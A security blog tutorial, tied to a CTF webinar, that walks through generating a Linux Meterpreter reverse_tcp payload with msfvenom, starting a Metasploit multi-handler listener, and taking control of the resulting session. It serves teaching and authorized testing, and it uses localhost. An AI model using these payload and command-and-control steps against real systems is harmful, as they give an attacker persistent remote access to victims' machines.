Metasploit has a ton of functionality related to customizing exploits, but many people use it primarily for its post-exploitation command-and-control (C2) capability. Using Metasploit’s Meterpreter can be really useful for anyone playing one of the many CTF virtual machines on VulnHub.com or a CTF at a conference.
In my most recent webinar—where I demonstrated an attack on a Batman Forever-themed single-player capture the flag (CTF) virtual machine—a live attendee asked about the commands I was using to set up Metasploit as a command-and-control (C2) framework. So, that’s the genesis for this blog.
Read on for a step-by-step walkthrough of how to use Metasploit for command and control, so you can use it in your own CTF experiences or authorized hacking.
Setting up Metasploit for command and control
As an attacker, you usually get your initial access either from phishing or by achieving remote code execution on a target system. In short, you’re able to run a command on a target computer.
For more convenience and capability, you install a C2 agent that brings other useful capabilities to allow you to maintain more persistent control, escalate privileges and potentially execute lateral movement throughout a network.
Metasploit’s Meterpreter is the universal classic C2 agent, packaged with a ton of community-contributed tools. Let’s see how it works.
First, we’ll use the msfvenom command to customize a Meterpreter. We’ll build up a single command line over multiple steps. Only the last msfvenom command shown here will be complete.
In my recent demo-heavy Batman-themed CTF webinar, as in most of my talk demos and training classes, I use a Kali Linux system and set the parameters to make an x86-compatible Linux binary that will “phone home,” or connect back to my Metasploit console. This is the “reverse TCP” mode. So, our msfvenom command will need to specify that we want an x86 Linux-compatible Meterpreter using the “reverse_tcp” method for connecting. That all goes into a single parameter, like so:
msfvenom -p linux/x86/meterpreter/reverse_tcp
Is that it? No, since the Meterpreter hasn’t been told what IP address or TCP port it can connect back to. We set these with two parameters, LHOST and LPORT. The “L” denotes our “local” Metasploit console, in contrast to “R” for remote. To make this easy to follow and test yourself, let’s set LHOST to 127.0.0.1, so you can run this test Meterpeter on the same system as your Metasploit console.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444
Here’s a trick – we can leave out “LPORT,” and let it use the default TCP port: 4444.
We need to set two more parameters. The first is “-f” for “file format.” Msfvenom can make files that run on multiple operating systems and can even make scripts, instead of binaries. We’ll ask for Linux’s standard binary format, the executable and linking format (ELF) using “-f elf”.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf
Finally, we need to tell msfvenom to write this payload to a file, instead of writing it out to the screen. We use the “-o” parameter to specify an output file path, resulting in the actual usable msfvenom command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf -o meterpreter
After a few seconds, we’ll see that we have a new file called meterpreter.
So, we’ve created a Meterpreter that can connect back to a Metasploit console. Now, we need to start up a Metasploit console and tell it to listen for this Meterpreter. First, we run msfconsole at a command line:
Next, we tell it that we’d like to use the generic payload handler, the “multi-handler” module.
We need to tell the multi-handler what payload type is connecting back, using the same value we used in our msfvenom command:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
We need to tell the multi-handler what IP address to listen on – this will correspond to the LHOST value we set in our msfvenom command:
set LHOST 127.0.0.1
Finally, we run “exploit” to start this module, passing the “-j” option to make this a background job, allowing us to continue running other commands in Metasploit, if we like.
Let’s test this out by starting another shell or terminal window on the same system so we can run the Meterpreter and see it connect back to us. We start a new window, make the Meterpreter executable and run it.
chmod u+x meterpreter
If you switch back over to your Metasploit console window, you’ll see that you have a Meterpreter session waiting for you. You can interact with it using the session command.
sessions -i 1
To see all the things that Meterpreter can do, use the help command:
Take a look at this list! You can upload and download files, set up port forwarders to proxy traffic through the remote system, and even play music on the remote system’s speakers. There are multi-tasking features to make it easier to run multiple programs and even to control multiple systems from one Metasploit console. It’s very useful!
You can use what you’ve just learned to repeat the attack from the webinar, so please go watch the “Linux Attack and Defense: Batman Edition” webinar. There’s a fun and challenging attack path on this one, filled with a riddle and other bits of throwback humor. You can watch the on-demand webinar, then download the virtual machine to try the attack path yourself. Watch my Twitter @jaybeale or Mastodon (@email@example.com) feeds for the Batman virtual machine download!
Linux Security - Related Resources
Attacking and Defending Linux: Breaking out of the Matrix Edition (webinar with Jay Beale)
Jay Beale, CEO, CTO at InGuardians, Inc.
Jay Beale has created several defensive security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which were used widely throughout industry and government. He has served as an invited speaker at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the “Stealing the Network” series. He has led training classes on Linux Hardening and other topics at Black Hat, CanSecWest, RSA, and IDG conferences, as well as in private corporate training. Jay is a co-founder, Chief Operating Officer and CTO of the information security consulting company InGuardians.